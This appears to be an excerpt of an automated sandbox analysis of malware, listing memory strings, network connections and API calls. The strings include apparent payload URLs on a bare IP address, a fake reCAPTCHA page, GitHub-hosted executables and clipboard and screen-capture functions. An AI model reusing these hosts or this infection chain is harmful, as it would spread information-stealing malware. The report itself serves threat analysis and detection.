00000003.00000003.2107661339.0000020E2D33A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2107514434.0000020E2D338000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2154237508.0000020E2D43D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088287641.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2087511718.0000020E2CD63000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2079624291.0000020E2CD2E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2107724247.0000020E2D33B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2152977377.0000020E2CD7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.112/1/2.png
Source: powershell.exe, 00000007.00000002.2134150506.0000022D80EB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.112/1/2.pngX
Source: powershell.exe, 00000008.00000002.2132331427.000001D0804B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.112/1/3.png
Source: mshta.exe, 00000003.00000003.2097676404.0000020E2CE95000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105797208.0000020E2CE99000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105602304.0000020E2CE96000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105700897.0000020E2CE97000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.112/1/3.png$TC=$TC.replace(
Source: powershell.exe, 00000008.00000002.2132331427.000001D080EB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.112/1/3.pngX
Source: powershell.exe, 00000007.00000002.2134150506.0000022D81662000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.H
Source: powershell.exe, 00000005.00000002.2129677364.0000024B81662000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.H2
Source: powershell.exe, 00000008.00000002.2132331427.000001D081661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.Hr
Source: svchost.exe, 00000004.00000002.3291805384.000001A4C5000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: RegSvcs.exe, 0000000C.00000002.3287680799.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegSvcs.exe, 0000000C.00000002.3330506711.00000000053B3000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.12.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegSvcs.exe, 0000000C.00000002.3287680799.0000000000C91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab1
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: RegSvcs.exe, 0000000B.00000002.2124142825.0000000001458000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: powershell.exe, 00000005.00000002.2280800865.0000024B90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B8191F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2333849561.0000022D90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D81923000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2321823186.000001D090073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2132331427.000001D0818C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2060609253.000002793F61B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080001000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2125339652.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002FDD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: powershell.exe, 00000005.00000002.2129677364.0000024B8168F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D8166A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081669000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.2132331427.000001D0818C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2102151892.0000020E2D3B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.protware.com
Source: mshta.exe, 00000003.00000003.2106417373.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2096936838.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106547656.0000020E2D439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105666148.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2079685811.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106126871.0000020E2CCD3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2154237508.0000020E2D43D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088287641.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080802003.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2152346497.0000020E2CCD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.protware.com/
Source: powershell.exe, 00000000.00000002.2060609253.000002793F5CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000000.00000002.2060609253.000002793F5FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=I8QM230l1pb_&a
Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=dK492ur3
Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=ugSp
Source: RegSvcs.exe, 0000000D.00000002.2153761108.00000000011B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: RegSvcs.exe, 0000000D.00000002.2153761108.00000000011B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000004.00000003.2078790926.000001A4C4DE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
Source: powershell.exe, 00000008.00000002.2132331427.000001D0818C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.2129677364.0000024B80EA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080EB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: mshta.exe, 00000003.00000003.2105547941.000002062AA66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137414096.000002062AA67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2074972565.000002062AA66000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: powershell.exe, 00000005.00000002.2280800865.0000024B90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B8191F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2333849561.0000022D90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D81923000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2321823186.000001D090073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: qmgr.db.4.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
Source: powershell.exe, 00000005.00000002.2129677364.0000024B8168F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D8166A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081669000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000005.00000002.2129677364.0000024B8168F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D8166A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081669000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: RegSvcs.exe, 0000000D.00000002.2151633719.000000000116A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2152709553.000000000117D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: RegSvcs.exe, 0000000D.00000002.2151633719.000000000116A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900R
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: RegSvcs.exe, 0000000D.00000002.2153761108.00000000011B6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/
Source: mshta.exe, 00000003.00000002.2154237508.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, 00.ps1	String found in binary or memory: https://view-reserve.com/recaptcha-verify.html
Source: mshta.exe, 00000003.00000002.2152048754.0000020E2CC92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2074933284.000002062AAA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.html...
Source: mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.html8
Source: mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlB
Source: mshta.exe, 00000003.00000003.2096831350.000002062AAB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2136717878.000002062A9D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2085261392.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137977166.000002062AAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2074933284.000002062AAA7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105489121.000002062AAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088207114.000002062AAA3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlC:
Source: mshta.exe, 00000003.00000002.2139043663.000002062AB50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlH
Source: mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlINetCookies
Source: mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlK
Source: mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlL
Source: mshta.exe, 00000003.00000003.2105666148.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2101288585.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106417373.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088287641.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2154237508.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlLMEM
Source: mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlU
Source: mshta.exe, 00000003.00000003.2105666148.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2101288585.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106417373.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088287641.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2154237508.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlX
Source: mshta.exe, 00000003.00000003.2105602304.0000020E2CE9D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlYehItOKPCrVOrOVMGXyZZbKtNyrVXuwla
Source: mshta.exe, 00000003.00000002.2139261010.000002062AB60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.html_AP
Source: mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmld
Source: mshta.exe, 00000003.00000002.2153759540.0000020E2CF10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmldJ
Source: mshta.exe, 00000003.00000003.2074933284.000002062AAA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmleS
Source: mshta.exe, 00000003.00000003.2097676404.0000020E2CE95000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlhttps://view-reserve.com/recaptcha-verify.html
Source: mshta.exe, 00000003.00000003.2096936838.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080802003.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106321743.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2152346497.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmlp-
Source: mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://view-reserve.com/recaptcha-verify.htmly
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 92.255.57.120:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49711 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 13_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

13_2_004363E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 13_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

13_2_004363E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 13_2_00436590 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

13_2_00436590

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_01950EE0 NtSetValueKey,		11_2_01950EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 11_2_01950ED8 NtSetValueKey,		11_2_01950ED8

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF8488E8529	5_2_00007FF8488E8529
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF8488E5680	5_2_00007FF8488E5680
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF8488E67F0	5_2_00007FF8488E67F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FF8488D5D77	7_2_00007FF8488D5D77
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FF848905D7F	8_2_00007FF848905D7F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_064C237F	12_2_064C237F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_064C0040	12_2_064C0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 12_2_064C2454	12_2_064C2454
